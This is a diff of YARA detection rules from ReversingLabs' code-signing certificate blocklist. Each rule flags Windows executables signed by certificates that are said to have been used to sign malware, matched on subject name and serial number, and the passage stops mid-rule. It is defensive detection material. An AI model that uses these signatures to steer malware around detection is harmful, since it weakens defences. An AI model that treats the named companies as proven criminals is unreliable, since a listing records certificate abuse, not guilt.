"ecc2f6bfda1a0afd016f0a5183c0d1cdfe5d5e06c893a7d9a3d7cb7f9bc4bf16" score = 75 quality = 90 tags = "INFO, FILE" @@ -20112,22 +39903,22 @@ rule REVERSINGLABS_Cert_Blocklist_7D20Dec3797A1Ac30649Ebb184265B79 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Jiang Liu" and pe.signatures[i].serial=="7d:20:de:c3:79:7a:1a:c3:06:49:eb:b1:84:26:5b:79" and 1474156800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "REIGN BROS ApS" and (pe.signatures[i].serial=="00:d4:ef:1a:b6:ab:5d:3c:b3:5e:4e:fb:79:84:de:f7:a2" or pe.signatures[i].serial=="d4:ef:1a:b6:ab:5d:3c:b3:5e:4e:fb:79:84:de:f7:a2") and 1611187200<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_187D92861076E469B5B7A19E2A9Fd4Ba : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_066276Af2F2C7E246D3B1Cab1B4Aa42E : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "0a156a49-c737-5bdb-9178-34121af490d6" + id = "97f791d5-7a73-5da7-984e-32bb94d0e83f" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L14422-L14438" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "7383a7fb31a0a913dff1740015ff702642fbb41d8e5a528a8684c80e66026e9d" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L8512-L8528" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "30d4fa2cbc75d3a6258cdf0374159f25ea152c39784f8b7e9c461978df865dc0" score = 75 quality = 90 tags = "INFO, FILE" @@ -20137,22 +39928,22 @@ rule REVERSINGLABS_Cert_Blocklist_187D92861076E469B5B7A19E2A9Fd4Ba : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Xin Zhou" and pe.signatures[i].serial=="18:7d:92:86:10:76:e4:69:b5:b7:a1:9e:2a:9f:d4:ba" and 1476748800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "IQ Trade ApS" and pe.signatures[i].serial=="06:62:76:af:2f:2c:7e:24:6d:3b:1c:ab:1b:4a:a4:2e" and 1616630400<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_199A9476Feca3C004Ff889D34545De07 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_65Cd323C2483668B90A44A711D2A6B98 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "4bb98380-70e5-5ad9-adb2-2e6e10f35258" + id = "e2ed910d-2264-58c1-a1a0-3c131020a2cf" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L14440-L14456" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "39c6efefcbd78d5e08ffd8d3989cab3bdf273a1847b2a961f9e68c9ee95e85b6" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L8530-L8546" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "653aff6f3913f1bf51e90e7a835dbb5441457175797cefdddd234a6c2c0f11ad" score = 75 quality = 90 tags = "INFO, FILE" @@ -20162,22 +39953,22 @@ rule REVERSINGLABS_Cert_Blocklist_199A9476Feca3C004Ff889D34545De07 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Funcall" and pe.signatures[i].serial=="19:9a:94:76:fe:ca:3c:00:4f:f8:89:d3:45:45:de:07" and 1138060800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "OOO Giperion" and pe.signatures[i].serial=="65:cd:32:3c:24:83:66:8b:90:a4:4a:71:1d:2a:6b:98" and 1602547200<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_1Efe65 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_5A17D5De74Fd8F09Df596Df3123139Bb : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "e402e3b4-a598-504d-85b8-8c1994cb51fc" + id = "4a3ffa4a-c080-5d76-9655-010cde091ae2" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L14458-L14474" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "f849b6899b6766807cfddf99ecb809fe923f35f04de09b62235da352ce6e6e24" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L8548-L8564" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "7ed62740fe191d961ad32b2a79463cc9cbce557ea757e413860f7b4974904c03" score = 75 quality = 90 tags = "INFO, FILE" @@ -20187,22 +39978,22 @@ rule REVERSINGLABS_Cert_Blocklist_1Efe65 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Software Plugin Ltd." and pe.signatures[i].serial=="1e:fe:65" and 1063224491<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "ACTA FIS d.o.o." and pe.signatures[i].serial=="5a:17:d5:de:74:fd:8f:09:df:59:6d:f3:12:31:39:bb" and 1611273600<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_0Af7E2B6A3Deb99291Dcaf66 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_15Da61D7E1A631803431561674Fb9B90 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "f9c18796-995e-58f8-8406-9adcad143ae7" + id = "07518dc2-bd6c-5a4c-b537-68f5a462cdc2" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L14476-L14492" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "270b5655a0f54abceb520eaca714ed4f6d4de720883e2759acd5bb2f027dfd2b" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L8566-L8582" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "75d2c3b47fe9c863812f2c98fc565af9050b909a03528e2ea4a96542a3ec0c0d" score = 75 quality = 90 tags = "INFO, FILE" @@ -20212,22 +40003,22 @@ rule REVERSINGLABS_Cert_Blocklist_0Af7E2B6A3Deb99291Dcaf66 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "BIG JOURNEY TECHNOLOGY LIMITED" and pe.signatures[i].serial=="0a:f7:e2:b6:a3:de:b9:92:91:dc:af:66" and 1474523112<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "JAY DANCE STUDIO d.o.o." and pe.signatures[i].serial=="15:da:61:d7:e1:a6:31:80:34:31:56:16:74:fb:9b:90" and 1610668800<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_45E27C4Dfa5E6175566A13B1B6Ddf3F5 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_7Ab21306B11Ff280A93Fc445876988Ab : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "b4ab6397-5e15-5eb3-9f5d-658c5e3a7e3d" + id = "656bb2a6-bb41-5190-af10-280351e64c66" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L14494-L14510" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "9bcbb84207984b259463482f094bf0f3815f0d74317b6b864dab44769ff5e7e8" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L8584-L8600" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "0cda954aa807336a6737716d0fa43d696376c240ab7be9d8477baf8800604bf1" score = 75 quality = 90 tags = "INFO, FILE" @@ -20237,22 +40028,22 @@ rule REVERSINGLABS_Cert_Blocklist_45E27C4Dfa5E6175566A13B1B6Ddf3F5 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Selig Michael Irfan" and pe.signatures[i].serial=="45:e2:7c:4d:fa:5e:61:75:56:6a:13:b1:b6:dd:f3:f5" and 1465474542<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "ABC BIOS d.o.o." and pe.signatures[i].serial=="7a:b2:13:06:b1:1f:f2:80:a9:3f:c4:45:87:69:88:ab" and 1611014400<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_37D36A4E61C0Ac68Ceb8Bfcef2Dbf283 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_634E16E38F12E9A71Aca08E4C6B2Dbb9 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "8fc73b48-6797-558a-8265-9aca396e899f" + id = "4aa7bea7-06fb-5d90-bac4-c8ca1ca5c02f" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L14512-L14528" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "41e126600aae5646b808ed0a4294faa9a63e47842e9cde4fee9e5e65919af7ee" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L8602-L8618" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "08950f276e5cf3fe4b5f7421ba671dfd72585aac3bbed7868fdb0e5aa90ec10e" score = 75 quality = 90 tags = "INFO, FILE" @@ -20262,22 +40053,22 @@ rule REVERSINGLABS_Cert_Blocklist_37D36A4E61C0Ac68Ceb8Bfcef2Dbf283 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "ANAVERIS LIMITED" and pe.signatures[i].serial=="37:d3:6a:4e:61:c0:ac:68:ce:b8:bf:ce:f2:db:f2:83" and 1532476800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "AUTO RESPONSE LTD CYF" and pe.signatures[i].serial=="63:4e:16:e3:8f:12:e9:a7:1a:ca:08:e4:c6:b2:db:b9" and 1616112000<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_4321De10738278B93683Ca542407F103 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_289051A83F350A2C600187C99B6C0A73 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "bf800655-cde4-59fa-9574-1055522fe074" + id = "55497d57-7d4f-50e1-85a6-e60786084e3f" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L14530-L14546" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "2787375605310877891ef924268f4660d1c8aa020e00674c1b1d7eb3c4f5b2fb" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L8620-L8636" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "cd5d6f95f0cfdbf8d37ea78d061ce00512b6cb7c899152b1640673494d539dd1" score = 75 quality = 90 tags = "INFO, FILE" @@ -20287,22 +40078,22 @@ rule REVERSINGLABS_Cert_Blocklist_4321De10738278B93683Ca542407F103 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "We Build Toolbars LLC" and pe.signatures[i].serial=="43:21:de:10:73:82:78:b9:36:83:ca:54:24:07:f1:03" and 1367884800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "HALL HAULAGE LTD LTD" and pe.signatures[i].serial=="28:90:51:a8:3f:35:0a:2c:60:01:87:c9:9b:6c:0a:73" and 1616716800<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_2A6B2Df210Be14F4E18E10C7 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_818631110B5D14331Dac7E6Ad998B902 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "150773ee-5d85-522d-a693-63bb6a7d1de2" + id = "6a8f3abd-199c-5e2f-a60e-46e869831445" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L14548-L14564" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "24ae1664c35b7947e2e638bf620d9ab572c70df9cdc1403cc00b422a45ff9194" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L8638-L8656" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "5e0de3848adf933632c2eb8cf5ead61d6470237386ba8b48d57a278d99dba324" score = 75 quality = 90 tags = "INFO, FILE" @@ -20312,22 +40103,22 @@ rule REVERSINGLABS_Cert_Blocklist_2A6B2Df210Be14F4E18E10C7 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures[i].serial=="2a:6b:2d:f2:10:be:14:f4:e1:8e:10:c7" and 1472095404<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "2 TOY GUYS LLC" and (pe.signatures[i].serial=="00:81:86:31:11:0b:5d:14:33:1d:ac:7e:6a:d9:98:b9:02" or pe.signatures[i].serial=="81:86:31:11:0b:5d:14:33:1d:ac:7e:6a:d9:98:b9:02") and 1571616000<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_412Ab2A50E8028Ddcbc499Ddf45F2045 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_277Cd16De5D61B9398B645Afe41C09C7 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "aabb3a66-5677-5359-9d81-92c8d4c7d910" + id = "d863faac-7b6e-5e1d-960f-8379347c6838" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L14566-L14582" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "a5b85d13dee51d68af28394ecee3dcc2efe7add4d26c2a8033d1855b33ac6271" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L8658-L8674" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "696467d699dec060b205f36f53dbe157b241823757d72798b35235d6530fd193" score = 75 quality = 90 tags = "INFO, FILE" @@ -20337,22 +40128,22 @@ rule REVERSINGLABS_Cert_Blocklist_412Ab2A50E8028Ddcbc499Ddf45F2045 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Ding Ruan" and pe.signatures[i].serial=="41:2a:b2:a5:0e:80:28:dd:cb:c4:99:dd:f4:5f:20:45" and 1479340800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "THE SIGN COMPANY LIMITED" and pe.signatures[i].serial=="27:7c:d1:6d:e5:d6:1b:93:98:b6:45:af:e4:1c:09:c7" and 1619049600<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_0747F6A8C3542F954B113Fd98C7607Cf : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_D0Eda76C13D30C97015708790Bb94214 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "de5fbb40-7d41-5f3e-97c9-a6882c19ebb5" + id = "aa323bac-a9f5-560f-b44a-3cf2b26351bb" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L14584-L14600" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "9d5e5c98f3ef372532cfc4f544d5d3f620dc2e49d8b6e1c96df29d2a38042019" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L8676-L8694" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "2112ebfb7c9ebbbccb20cefcd23bb49142da770feb16ee8eef5eb27646226785" score = 75 quality = 90 tags = "INFO, FILE" @@ -20362,22 +40153,22 @@ rule REVERSINGLABS_Cert_Blocklist_0747F6A8C3542F954B113Fd98C7607Cf : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Xin Zhou" and pe.signatures[i].serial=="07:47:f6:a8:c3:54:2f:95:4b:11:3f:d9:8c:76:07:cf" and 1474329600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "LAEN ApS" and (pe.signatures[i].serial=="00:d0:ed:a7:6c:13:d3:0c:97:01:57:08:79:0b:b9:42:14" or pe.signatures[i].serial=="d0:ed:a7:6c:13:d3:0c:97:01:57:08:79:0b:b9:42:14") and 1619136000<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_2572B484Fa0A61Be7288D785D7Bda7D3 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_6333Ed618F88A05B4D82Ad7Bf66Cb0Fa : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "b1d71baa-9100-512d-91f4-7286a740e5f2" + id = "c4d3603e-57e2-57df-a055-c43d449242c7" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L14602-L14618" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "d6b23ba706a640a1e76ad7ab0a70c845c9366ac8355eea5439f76f6993c9c6be" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L8696-L8712" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "b088ac4b74a8cf3dddb67c8de2b7c3c5f537287a0454c0030c0eb4069c465c7d" score = 75 quality = 90 tags = "INFO, FILE" @@ -20387,22 +40178,22 @@ rule REVERSINGLABS_Cert_Blocklist_2572B484Fa0A61Be7288D785D7Bda7D3 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "SILVA, OOO" and pe.signatures[i].serial=="25:72:b4:84:fa:0a:61:be:72:88:d7:85:d7:bd:a7:d3" and 1495152000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "RHM LIMITED" and pe.signatures[i].serial=="63:33:ed:61:8f:88:a0:5b:4d:82:ad:7b:f6:6c:b0:fa" and 1616457600<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_6726Bd04204746C46857887F : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_3B777165B125Bccc181D0Bac3F5B55B3 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "ef882d82-f535-57c3-9d45-8d47ecc7f607" + id = "f065e99f-9cce-55cb-a592-60b89c26028a" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L14620-L14636" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "11d25dff7e05e6f97725e919cc6c978d7f2e64a91cf04b72461c71d592dfc2dc" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L8714-L8730" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "80aff3d6f45f5847d5d39b170b9d0e70168d02569ca6d86a2c39150399d290fc" score = 75 quality = 90 tags = "INFO, FILE" @@ -20412,22 +40203,22 @@ rule REVERSINGLABS_Cert_Blocklist_6726Bd04204746C46857887F : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "BIG JOURNEY TECHNOLOGY LIMITED" and pe.signatures[i].serial=="67:26:bd:04:20:47:46:c4:68:57:88:7f" and 1474352405<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "STAND ALONE MUSIC LTD" and pe.signatures[i].serial=="3b:77:71:65:b1:25:bc:cc:18:1d:0b:ac:3f:5b:55:b3" and 1607299200<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_4463D8B31E0F87C14233D4D0D2C487A0 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_5B37Ac3479283B6F9D75Ddf0F8742D06 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "eefd6fa2-7ed7-51d0-bddd-90f0727a93cc" + id = "cc124d3f-2446-57a2-a206-0a5e569fc703" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L14638-L14654" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "04ce664fceb4a617294e860d5364d8a4ce8e055fd2baebb8be69f258d9c70ac7" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L8732-L8748" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "b7abd389ac31cd970e6611c7c303714fdd658f45d4857ad524f5e8368edbb875" score = 75 quality = 90 tags = "INFO, FILE" @@ -20437,22 +40228,22 @@ rule REVERSINGLABS_Cert_Blocklist_4463D8B31E0F87C14233D4D0D2C487A0 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Yu Bao" and pe.signatures[i].serial=="44:63:d8:b3:1e:0f:87:c1:42:33:d4:d0:d2:c4:87:a0" and 1477612800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "ART BOOK PHOTO s.r.o." and pe.signatures[i].serial=="5b:37:ac:34:79:28:3b:6f:9d:75:dd:f0:f8:74:2d:06" and 1619740800<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_387982605E542D6D52F231Ca6F5657Cc : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_3112C69D460C781Fd649C71E61Bfec82 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "2d5731e1-b18b-544e-ae14-40d70b679618" + id = "f4d2f240-49a7-51f3-8db1-1c569aa63177" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L14656-L14672" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "d55cfd45bc0d330c0ed433a882874e4633ffbaa0d68288bea9058fe269d75ed9" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L8750-L8766" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "ed31b0a24d18a451163867f0f49df12af3ca0768f250ac8ce66d41405393130d" score = 75 quality = 90 tags = "INFO, FILE" @@ -20462,22 +40253,22 @@ rule REVERSINGLABS_Cert_Blocklist_387982605E542D6D52F231Ca6F5657Cc : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Jiang Liu" and pe.signatures[i].serial=="38:79:82:60:5e:54:2d:6d:52:f2:31:ca:6f:56:57:cc" and 1475884800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in 